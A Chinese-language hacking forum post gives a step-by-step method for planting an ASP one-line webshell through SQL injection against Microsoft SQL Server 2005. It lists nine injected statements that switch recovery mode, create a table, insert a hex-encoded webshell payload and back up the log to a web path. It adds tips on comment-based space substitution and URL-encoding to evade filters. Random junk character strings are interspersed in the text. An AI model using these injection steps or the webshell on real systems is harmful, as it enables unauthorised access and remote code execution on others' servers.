mssql2005 DB权限导出一句话

admin

网站路径也搞到了，本想使用差异备份，在数据库日志中插入一句话，然后备份到网站目录下拿shell的，估计是用户没有备份数据库的权限，但使用MSSQL2000的备份方法根本行不通，后来才想到MSSQL2005的备份和MSSQL2000有点不同。


+ C; ~+ `8 G- o, M# {后来在网上搜半天没有找到具体的备份语句，后来在群求助，小冰才发我了具体的利用语句，但贴出来的文章貌似没啥水准，大家都知道手工差异备份是自己需要修改数据库名和网站路径的，但那个文章中对语句没有做任何解释，无奈之下我只好自己尝试了，虽然测试的网站没有成功拿下shell，单语句是没有错误的，我在本地的MSSQL2005的查询分析器中测试通过了，再次特将语句整理出来分享个大家，并做好详细的解释说明，首先来贴出语句。
- B& `* ~! ~- f1 y1 c/ S* l
第一步
;alter/**/database/**/[Hospital]/**/set/**/recovery/**/full--
8 h& f6 J7 R1 X. z3 q6 p
第二步：
& Q& n2 [8 \% L! w* x* M% M: R* ^;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--

第三步
;drop/**/table/**/[itpro]--

第四步
5 M# b3 A& I9 l8 h) D% T$ j2 q2 ^$ O;create/**/table/**/[itpro]([a]/**/image)--
& K6 @, Q# {# w& f
+ U" x) O5 t6 K1 g; G- x" i' D第五步
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--

$ z" J3 i; z; x4 C' b8 W" Z第六步
. B' Q8 {  q: v8 Z- p) B" I' k( l;insert/**/into/**/[itpro]([a])/**/values(0x3C25657865637574652872657175657374282261222929253EDA)--
* _6 F$ P5 R$ K( U: ?0 a, C
第七步
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x65003A005C007700650062005C007A002E00610073007000/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--

第八步
;drop/**/table/**/[itpro]--
9 N  d4 {; f' F( |& G5 p9 b
; a4 k0 P3 x6 j% F( b第九步
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
: D4 m9 z7 O- Z; p8 ^) x1 r& q
) e! s: h, Z9 ]3 |( @3 y+ T其中红色的“Hospital”既是数据库名，这个要根据自己的情况来修改，然后黄色的“0x3C25657865637574652872657175657374282261222929253EDA”是一句话“<%eval request("a")%>”的内容，橙色的“0x65003A005C007700650062005C007A002E00610073007000”为备份的路径“e:\web\z.asp”，都是使用的SQL_En的格式，另外第三步大可以不需要！他是删除itpro的表，如果第一次的话这个表是不存在的，就会提示无权限的信息。另外在语句“disk=@d”的地方可以将“=”更换成“%3D”，就是使用URL编码。“/**/”就等于空格了，这个大家在学习注入的过程中应该了解，也可以更换成“%20”。